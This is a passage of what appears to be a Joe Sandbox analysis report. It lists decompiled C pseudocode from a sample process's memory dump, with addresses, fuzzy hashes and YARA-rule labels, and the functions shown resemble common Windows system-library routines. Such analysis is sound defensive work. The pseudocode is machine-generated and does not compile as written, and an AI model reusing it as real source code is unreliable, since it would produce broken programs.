						if(_t27 != 0) {
							goto L14;
						}
						L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











                                                              0x00a637fa
                                                              0x00a637fc
                                                              0x00a63805
                                                              0x00a63808
                                                              0x00a63808
                                                              0x00a63814
                                                              0x00a63818
                                                              0x00a63846
                                                              0x00a63848
                                                              0x00a6384b
                                                              0x00a6384b
                                                              0x00a63852
                                                              0x00000000
                                                              0x00a63854
                                                              0x00a63856
                                                              0x00000000
                                                              0x00000000
                                                              0x00a63863
                                                              0x00000000
                                                              0x00a63863
                                                              0x00a6381a
                                                              0x00a6381a
                                                              0x00a6381f
                                                              0x00a6386e
                                                              0x00a6386e
                                                              0x00a63871
                                                              0x00a63873
                                                              0x00a63873
                                                              0x00a63868
                                                              0x00000000
                                                              0x00a63868
                                                              0x00a63821
                                                              0x00a63826
                                                              0x00000000
                                                              0x00000000
                                                              0x00a63828
                                                              0x00a6382a
                                                              0x00a63841
                                                              0x00000000
                                                              0x00a63841

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ce3e1d36653d9eb2d213091e332efee25c6955987eea8ca3572b652629683deb
                                                              • Instruction ID: bc923d461ab07f2f9190fe47212e18287989bcb8fa4bdf791fd102b127d21a85
                                                              • Opcode Fuzzy Hash: ce3e1d36653d9eb2d213091e332efee25c6955987eea8ca3572b652629683deb
                                                              • Instruction Fuzzy Hash: 4A0196739456109BCB378B1A9A40EAABBB6DFD6B60B154069F9458B211DB30DE02C790
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A5002D Relevance: .1, Instructions: 55COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00A5002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E00A47D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E00A47D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E00A47D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E00A47D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                                                              0x00a50032
                                                              0x00a50037
                                                              0x00a50043
                                                              0x00a94b3a
                                                              0x00a50049
                                                              0x00a50049
                                                              0x00a50049
                                                              0x00a5004e
                                                              0x00a50053
                                                              0x00a94b48
                                                              0x00a94b5a
                                                              0x00a94b4a
                                                              0x00a94b53
                                                              0x00a94b53
                                                              0x00a94b5f
                                                              0x00000000
                                                              0x00a94b61
                                                              0x00000000
                                                              0x00a94b61
                                                              0x00a50059
                                                              0x00a50059
                                                              0x00a50060
                                                              0x00a94b6f
                                                              0x00a94b6f
                                                              0x00a50069
                                                              0x00a94b83
                                                              0x00000000
                                                              0x00000000
                                                              0x00a94b90
                                                              0x00a94b9b
                                                              0x00a94b9b
                                                              0x00a94ba4
                                                              0x00000000
                                                              0x00000000
                                                              0x00a94baa
                                                              0x00000000
                                                              0x00a5006f
                                                              0x00a5006f
                                                              0x00000000
                                                              0x00a5006f
                                                              0x00a50069

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                              • Instruction ID: 695149bcd87fccfbc260ce1f4380493464f6798d724d4b1ce7331d04c2ce3bd8
                                                              • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                              • Instruction Fuzzy Hash: E311C4367156C18FDB229B28CA55F3577E4FF45755F1900A0ED04876D2D739DC42C660
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A3766D Relevance: .1, Instructions: 54COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 94%
                                                              			E00A3766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E00A5F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E00A5F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L00A44620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










                                                              0x00a37672
                                                              0x00a3767f
                                                              0x00a37689
                                                              0x00a376de
                                                              0x00a376de
                                                              0x00a3768b
                                                              0x00a37691
                                                              0x00a37693
                                                              0x00a37697
                                                              0x00000000
                                                              0x00a37699
                                                              0x00a376a8
                                                              0x00000000
                                                              0x00a376aa
                                                              0x00a376ad
                                                              0x00a376b1
                                                              0x00000000
                                                              0x00a376b3
                                                              0x00a376b3
                                                              0x00a376b5
                                                              0x00a376ba
                                                              0x00a376bc
                                                              0x00a376bc
                                                              0x00a376c0
                                                              0x00000000
                                                              0x00a376c2
                                                              0x00a376ce
                                                              0x00a376ce
                                                              0x00a376c0
                                                              0x00a376b1
                                                              0x00a376a8
                                                              0x00a37697
                                                              0x00a376d9

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                              • Instruction ID: d27ca03cccd2a4241a89dcc54970e76bec2e31ecec06269974a11bcc3cf32f7d
                                                              • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                              • Instruction Fuzzy Hash: DC017CB2705619ABD730DF6ECD62E5FB6ADEB84BA0F240524B918CB250DB30DD0187A0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A29080 Relevance: .1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 69%
                                                              			E00A29080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0xb185ec;
				E00A42280(_t48, 0xb185ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E00A3FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0xb1538c; // 0x77e16828
					if( *_t84 != 0xb15388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0xaff6e8);
						E00A7D0E8(0xb185ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E00AF88F5(_t80, _t85, 0xb15388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0xb186c0; // 0x4d07b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0xb186b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E00A42280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E00AF88F5(0xb185ec, _t85, 0xb15388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E00A6AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0xb1b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0xb184c0;
																			if(_t82 >=  *0xb184c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E00AF9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E00A2922A(_t99);
										_t64 = E00A47D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E00AF8B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0xb186c0; // 0x4d07b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0xb186b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0xb186bc;
													_t87 = 0xb186b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E00A29240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0xb186c4;
												_t87 = 0xb186c0;
												L27:
												E00A59B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E00A7D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0xb15388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0xb1538c = _t51;
						goto L6;
					}
				}
			}




















                                                              0x00a29082
                                                              0x00a29083
                                                              0x00a29084
                                                              0x00a29085
                                                              0x00a29087
                                                              0x00a29096
                                                              0x00a29098
                                                              0x00a29098
                                                              0x00a2909e
                                                              0x00a290a8
                                                              0x00a290e7
                                                              0x00a290e7
                                                              0x00a290aa
                                                              0x00a290b0
                                                              0x00a290b7
                                                              0x00a290bd
                                                              0x00a290dd
                                                              0x00a290e6
                                                              0x00a290bf
                                                              0x00a290bf
                                                              0x00a290c7
                                                              0x00a290cf
                                                              0x00a290f1
                                                              0x00a290f2
                                                              0x00a290f4
                                                              0x00a290f5
                                                              0x00a290f6
                                                              0x00a290f7
                                                              0x00a290f8
                                                              0x00a290f9
                                                              0x00a290fa
                                                              0x00a290fb
                                                              0x00a290fc
                                                              0x00a290fd
                                                              0x00a290fe
                                                              0x00a290ff
                                                              0x00a29100
                                                              0x00a29102
                                                              0x00a29107
                                                              0x00a2910c
                                                              0x00a29110
                                                              0x00a29113
                                                              0x00a29115
                                                              0x00a29136
                                                              0x00a2913f
                                                              0x00a29143
                                                              0x00a837e4
                                                              0x00a837e4
                                                              0x00a29117
                                                              0x00a29117
                                                              0x00a2911d
                                                              0x00000000
                                                              0x00a2911f
                                                              0x00a2911f
                                                              0x00a29125
                                                              0x00000000
                                                              0x00a29127
                                                              0x00a2912d
                                                              0x00a29130
                                                              0x00a29134
                                                              0x00a29158
                                                              0x00a2915d
                                                              0x00a29161
                                                              0x00a29168
                                                              0x00a83715
                                                              0x00a2916e
                                                              0x00a2916e
                                                              0x00a29175
                                                              0x00a29177
                                                              0x00a2917e
                                                              0x00a2917f
                                                              0x00a29182
                                                              0x00a29182
                                                              0x00a29187
                                                              0x00a29187
                                                              0x00a2918a
                                                              0x00a2918d
                                                              0x00a2918f
                                                              0x00a29192
                                                              0x00a29195
                                                              0x00a29198
                                                              0x00a29198
                                                              0x00a29198
                                                              0x00a2919a
                                                              0x00000000
                                                              0x00000000
                                                              0x00a8371f
                                                              0x00a83721
                                                              0x00a83727
                                                              0x00a8372f
                                                              0x00a83733
                                                              0x00a83735
                                                              0x00a83738
                                                              0x00a8373b
                                                              0x00a8373d
                                                              0x00a83740
                                                              0x00000000
                                                              0x00a83746
                                                              0x00a83746
                                                              0x00a83749
                                                              0x00000000
                                                              0x00a8374f
                                                              0x00a8374f
                                                              0x00a83751
                                                              0x00a83757
                                                              0x00a83759
                                                              0x00a8375c
                                                              0x00a8375c
                                                              0x00a8375e
                                                              0x00a8375e
                                                              0x00a83761
                                                              0x00a83764
                                                              0x00000000
                                                              0x00000000
                                                              0x00a83766
                                                              0x00a83768
                                                              0x00a837a3
                                                              0x00a837a3
                                                              0x00a837a5
                                                              0x00a837a7
                                                              0x00a837ad
                                                              0x00a837b0
                                                              0x00a837b2
                                                              0x00a837bc
                                                              0x00a837c2
                                                              0x00a837c2
                                                              0x00a837b2
                                                              0x00a29187
                                                              0x00a29187
                                                              0x00a2918a
                                                              0x00a2918d
                                                              0x00a2918f
                                                              0x00a29192
                                                              0x00a29195
                                                              0x00000000
                                                              0x00a29195
                                                              0x00000000
                                                              0x00a8376a
                                                              0x00a8376a
                                                              0x00a8376a
                                                              0x00a8376c
                                                              0x00a8376c
                                                              0x00a8376f
                                                              0x00a83775
                                                              0x00000000
                                                              0x00000000
                                                              0x00a83777
                                                              0x00a83779
                                                              0x00a83782
                                                              0x00a83787
                                                              0x00a83789
                                                              0x00a83790
                                                              0x00a83790
                                                              0x00a8378b
                                                              0x00a8378b
                                                              0x00a8378b
                                                              0x00a83792
                                                              0x00a83795
                                                              0x00000000
                                                              0x00a83795
                                                              0x00000000
                                                              0x00a83779
                                                              0x00a83798
                                                              0x00000000
                                                              0x00a83798
                                                              0x00000000
                                                              0x00a83768
                                                              0x00a8379b
                                                              0x00a8379b
                                                              0x00a83751
                                                              0x00a83749
                                                              0x00000000
                                                              0x00a83740
                                                              0x00a291a0
                                                              0x00a291a3
                                                              0x00a291a9
                                                              0x00a291b0
                                                              0x00000000
                                                              0x00a291b0
                                                              0x00a29187
                                                              0x00a291b4
                                                              0x00a291b4
                                                              0x00a291bb
                                                              0x00a291c0
                                                              0x00a291c5
                                                              0x00a291c7
                                                              0x00a837da
                                                              0x00a291cd
                                                              0x00a291cd
                                                              0x00a291cd
                                                              0x00a291d2
                                                              0x00a291d5
                                                              0x00a29239
                                                              0x00a29239
                                                              0x00a291d7
                                                              0x00a291db
                                                              0x00a291e1
                                                              0x00a291e7
                                                              0x00a291fd
                                                              0x00a29203
                                                              0x00a2921e
                                                              0x00a29223
                                                              0x00000000
                                                              0x00a29205
                                                              0x00a29205
                                                              0x00a29208
                                                              0x00a2920c
                                                              0x00a29214
                                                              0x00a29214
                                                              0x00a2920c
                                                              0x00a291e9
                                                              0x00a291e9
                                                              0x00a291ee
                                                              0x00a291f3
                                                              0x00a291f3
                                                              0x00a291f3
                                                              0x00a291e7
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00a29134
                                                              0x00a29125
                                                              0x00a2911d
                                                              0x00a2914e
                                                              0x00a290d1
                                                              0x00a290d1
                                                              0x00a290d3
                                                              0x00a290d6
                                                              0x00a290d8
                                                              0x00000000
                                                              0x00a290d8
                                                              0x00a290cf

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 657d9e362d9f56ad58a8c889b1385bc8542944925f0b7f403ccceeadc9300846
                                                              • Instruction ID: 6e846e1af66dbd9fa52958149d2e87e7b9ff62d746a8be589a621fe1116aca0c
                                                              • Opcode Fuzzy Hash: 657d9e362d9f56ad58a8c889b1385bc8542944925f0b7f403ccceeadc9300846
                                                              • Instruction Fuzzy Hash: DE01F472505618CFC3248F08F940B52B7F9EF85B20F214176E5158B6A1C770DC81CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00ABC450 Relevance: .1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 46%
                                                              			E00ABC450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E00A69910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E00A695B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E00A695D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E00A695D0();
				return L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                                                              0x00abc458
                                                              0x00abc45d
                                                              0x00abc466
                                                              0x00abc468
                                                              0x00abc469
                                                              0x00abc46a
                                                              0x00abc46b
                                                              0x00abc46e
                                                              0x00abc46f
                                                              0x00abc471
                                                              0x00abc476
                                                              0x00abc476
                                                              0x00abc47c
                                                              0x00abc47e
                                                              0x00abc480
                                                              0x00abc480
                                                              0x00abc483
                                                              0x00abc484
                                                              0x00abc486
                                                              0x00abc488
                                                              0x00abc48f
                                                              0x00abc491
                                                              0x00abc493
                                                              0x00abc493
                                                              0x00abc48f
                                                              0x00abc498
                                                              0x00abc49e
                                                              0x00abc4ad
                                                              0x00abc4ad
                                                              0x00abc4b2
                                                              0x00abc4b4
                                                              0x00abc4cd

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                              • Instruction ID: 1d6c593a04801dc7e41b3d0059d3ced9ffbd5f3362b66efbd2202e3d93608bea
                                                              • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                              • Instruction Fuzzy Hash: FA01B176140505BFD722AF65CD95EA3F77DFF943A0F008526F21442562CB32ECA1CAA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AF4015 Relevance: .0, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 86%
                                                              			E00AF4015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E00A42280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E00A42280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0xb186ac);
					E00A2F900(0xb186d4, _t28);
					E00A3FFB0(0xb186ac, _t28, 0xb186ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E00A3FFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                                                              0x00af401a
                                                              0x00af401e
                                                              0x00af4023
                                                              0x00af4028
                                                              0x00af4029
                                                              0x00af402b
                                                              0x00af402f
                                                              0x00af4043
                                                              0x00af4046
                                                              0x00af4051
                                                              0x00af4057
                                                              0x00af405f
                                                              0x00af4062
                                                              0x00af4067
                                                              0x00af406f
                                                              0x00af407c
                                                              0x00af407c
                                                              0x00af408c
                                                              0x00af408c
                                                              0x00af4097

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b49fc50c6b33b7dfb75ee50c090f2b6d485d8e27c0c12181b266d4c0171d1bf5
                                                              • Instruction ID: 72b4a96402246ac43f66ea50c658ee8c3227e0c9947fa362db6b4a9eb6a2c431
                                                              • Opcode Fuzzy Hash: b49fc50c6b33b7dfb75ee50c090f2b6d485d8e27c0c12181b266d4c0171d1bf5
                                                              • Instruction Fuzzy Hash: 3F01A2726019457FC311AB79CE81E57B7ACFF89760B400239F60883A22CF24EC51C6E4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AE14FB Relevance: .0, Instructions: 48COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 61%
                                                              			E00AE14FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0xb1d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E00A6FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E00A47D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E00A6B640(E00A69AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                              0x00ae14fb
                                                              0x00ae14fb
                                                              0x00ae150a
                                                              0x00ae1514
                                                              0x00ae1519
                                                              0x00ae151b
                                                              0x00ae1526
                                                              0x00ae152c
                                                              0x00ae1534
                                                              0x00ae1537
                                                              0x00ae153a
                                                              0x00ae1545
                                                              0x00ae1557
                                                              0x00ae1547
                                                              0x00ae1550
                                                              0x00ae1550
                                                              0x00ae1562
                                                              0x00ae1563
                                                              0x00ae1565
                                                              0x00ae156a
                                                              0x00ae157f

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ed3ee38905d2c9c070dc90ae65deeb967dfef07ad9c92f1ee594b0ddfe39c7bf
                                                              • Instruction ID: f701356a0ca29c314dc3fde6f73f13e4d487dcc93c6d3466a0d0bb0c31048091
                                                              • Opcode Fuzzy Hash: ed3ee38905d2c9c070dc90ae65deeb967dfef07ad9c92f1ee594b0ddfe39c7bf
                                                              • Instruction Fuzzy Hash: A901B571A00258AFCB00EFA9D942EAEB7B8EF44700F404066F914EB381DA70DE00CB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AE138A Relevance: .0, Instructions: 48COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 61%
                                                              			E00AE138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
